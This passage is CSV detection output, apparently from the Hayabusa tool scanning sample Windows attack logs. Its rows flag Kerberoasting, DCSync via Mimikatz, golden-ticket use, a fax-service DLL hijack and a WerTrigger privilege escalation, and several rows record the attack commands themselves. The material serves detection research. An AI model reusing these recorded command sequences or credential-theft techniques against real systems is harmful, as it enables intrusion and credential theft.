accessed.evtx +2020-08-02 20:21:46.110 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx +2020-08-02 20:21:46.117 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx +2020-08-02 20:21:46.153 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx +2020-08-02 20:21:46.166 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx +2020-08-02 20:21:46.181 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx +2020-08-02 20:21:46.181 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx +2020-08-02 20:33:06.521 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: : Service: : IP Address: ::ffff:10.23.23.9 : Status: 
0x25,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx +2020-08-02 20:33:06.523 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: Svc-SQL-DB01 : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx +2020-08-02 20:33:06.523 +09:00,rootdc1.offsec.lan,4769,medium,Suspicious Kerberos RC4 Ticket Encryption,,rules/sigma/builtin/security/win_susp_rc4_kerberos.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx +2020-08-02 20:37:11.847 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: ROOTDC1$@OFFSEC.LAN : Service: ROOTDC1$ : IP Address: ::1 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx +2020-08-02 20:37:12.567 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: ROOTDC1$@OFFSEC.LAN : Service: ROOTDC1$ : IP Address: ::1 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx +2020-08-02 20:37:54.898 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: WEC01$@OFFSEC.LAN : Service: 
ROOTDC1$ : IP Address: ::ffff:10.23.42.22 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx +2020-08-02 20:37:54.999 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: WEC01$@OFFSEC.LAN : Service: WEC01$ : IP Address: ::ffff:10.23.42.22 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx +2020-08-02 20:37:55.142 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: WEC01$@OFFSEC.LAN : Service: ROOTDC2$ : IP Address: ::ffff:10.23.42.22 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx +2020-08-02 20:37:55.483 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: WEC01$@OFFSEC.LAN : Service: ROOTDC1$ : IP Address: ::ffff:10.23.42.22 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx +2020-08-02 20:37:55.484 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: WEC01$@OFFSEC.LAN : Service: krbtgt : IP Address: ::ffff:10.23.42.22 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos 
Tickets/ID4769-Kerberoast ticket with low encryption.evtx +2020-08-02 20:37:55.625 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: WEC01$@OFFSEC.LAN : Service: ROOTDC1$ : IP Address: ::ffff:10.23.42.22 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx +2020-08-02 21:02:34.103 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 55731 : LogonID: 0x11b8c41e,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx +2020-08-02 21:02:35.117 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 55731 : LogonID: 0x11b8c703,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx +2020-08-02 21:02:37.166 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 55733 : LogonID: 0x11b8c741,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx +2020-08-02 21:03:03.560 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: ROOTDC1$ : Workstation: - : IP Address: fe80::1cae:5aa4:9d8d:106a : Port: 58736 : LogonID: 
0x11b8cd00,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx +2020-08-02 21:03:08.715 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: FS02$ : Workstation: - : IP Address: 10.23.42.18 : Port: 62274 : LogonID: 0x11b8d014,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx +2020-08-02 21:03:12.993 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 55738 : LogonID: 0x11b8d057,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx +2020-08-02 21:04:02.850 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 55748 : LogonID: 0x11b8dcc1,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx +2020-08-02 21:04:09.689 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 54927 : LogonID: 0x11b9e9a8,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx +2020-08-02 21:04:09.695 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 54931 : LogonID: 
0x11b9e9c0,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx +2020-08-02 21:04:09.696 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 54933 : LogonID: 0x11b9e9d3,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx +2020-08-02 21:04:09.696 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 54932 : LogonID: 0x11b9e9e5,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx +2020-08-02 21:04:09.816 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 55750 : LogonID: 0x11b9ea1f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx +2020-08-02 21:26:03.702 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan : Service: ROOTDC2$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx +2020-08-02 21:26:11.437 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan : Service: 
ROOTDC2$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx +2020-08-02 21:26:20.424 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan : Service: ROOTDC1$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx +2020-08-02 21:27:02.387 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan : Service: ROOTDC1$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx +2020-08-02 21:27:19.056 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: ROOTDC1$@OFFSEC.LAN : Service: ROOTDC1$ : IP Address: ::1 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx +2020-08-02 21:27:19.742 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: ROOTDC1$@OFFSEC.LAN : Service: ROOTDC1$ : IP Address: ::1 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx +2020-08-02 21:31:20.566 
+09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan : Service: ROOTDC1$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx +2020-08-02 21:31:20.567 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan : Service: krbtgt : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx +2020-08-02 21:31:20.925 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan : Service: FS02$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx +2020-08-02 21:31:20.926 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan : Service: MSSQL01$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx +2020-08-03 01:24:07.551 +09:00,MSEDGEWIN10,7,high,Fax Service DLL Search Order Hijack,,rules/sigma/image_load/sysmon_susp_fax_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx +2020-08-03 01:24:07.558 
+09:00,MSEDGEWIN10,5145,high,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_NetSvc_SessionToken_Retrival_via_localSMB_Auth_5145.evtx +2020-08-03 01:24:26.809 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""c:\windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx +2020-08-03 01:24:28.640 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: whoami : Path: C:\Windows\System32\whoami.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ""c:\windows\system32\cmd.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx +2020-08-03 01:24:28.640 +09:00,MSEDGEWIN10,1,high,Run Whoami as SYSTEM,,rules/sigma/process_creation/win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx +2020-08-03 01:24:28.640 +09:00,MSEDGEWIN10,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx +2020-08-03 01:24:28.640 +09:00,MSEDGEWIN10,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx +2020-08-12 22:05:20.029 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\SYSTEM32\cmd.exe /c """"C:\Program Files\Npcap\CheckStatus.bat"""" : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: 
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:05:20.378 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: cmd.exe : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:05:20.378 +09:00,MSEDGEWIN10,1,high,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/sysmon_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:05:36.555 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:05:38.260 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\cmd.exe /c reg query ""HKLM\Software\WOW6432Node\Npcap"" /ve 2>nul | find ""REG_SZ"" : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\SYSTEM32\cmd.exe /c """"C:\Program Files\Npcap\CheckStatus.bat""""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:05:45.570 +09:00,MSEDGEWIN10,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege 
Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:06:00.737 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\cmd.exe /c rmdir /s/q C:\ProgramData\Microsoft\Windows\WER\ReportQueue\a_b_c_d_e > nul 2>&1 : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: WerTrigger.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:06:01.637 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\cmd.exe /c mkdir,C:\ProgramData\Microsoft\Windows\WER\ReportQueue\a_b_c_d_e : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: WerTrigger.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:06:02.552 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\cmd.exe /c copy Report.wer C:\ProgramData\Microsoft\Windows\WER\ReportQueue\a_b_c_d_e > nul 2>&1 : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: WerTrigger.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:06:03.487 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\cmd.exe /c schtasks /run /TN ""Microsoft\Windows\Windows Error Reporting\QueueReporting"" > nul 2>&1 : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: WerTrigger.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:06:04.075 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : 
Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\wermgr.exe -upload",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:06:08.143 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: whoami : Path: C:\Windows\System32\whoami.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ""C:\Windows\system32\cmd.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:06:08.143 +09:00,MSEDGEWIN10,1,high,Run Whoami as SYSTEM,,rules/sigma/process_creation/win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:06:08.143 +09:00,MSEDGEWIN10,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:06:08.143 +09:00,MSEDGEWIN10,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-21 00:35:28.503 +09:00,rootdc1.offsec.lan,5140,informational,Network Share Access,User: hack-admu-test1 : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx +2020-08-21 00:36:32.382 +09:00,rootdc1.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx +2020-08-21 00:36:32.391 +09:00,rootdc1.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx +2020-08-21 00:37:06.186 +09:00,rootdc1.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx +2020-08-21 00:37:14.331 +09:00,rootdc1.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx +2020-08-21 00:37:17.039 +09:00,rootdc1.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx +2020-08-21 00:37:35.319 +09:00,rootdc1.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx +2020-08-21 00:37:35.773 +09:00,rootdc1.offsec.lan,5140,informational,Network Share Access,User: JUMP01$ : Share Name: \\*\IPC$ : Share Path: : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx +2020-08-21 00:38:23.185 +09:00,rootdc1.offsec.lan,5140,informational,Network Share Access,User: not_existing_user : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID5140-ADMIN$ share connection with Golden ticket.evtx +2020-08-21 00:39:15.820 +09:00,rootdc1.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID5140-ADMIN$ share connection with Golden ticket.evtx +2020-08-21 00:41:58.884 +09:00,fs02.offsec.lan,4624,informational,Logon Type 3 - Network,User: not_existing_user : 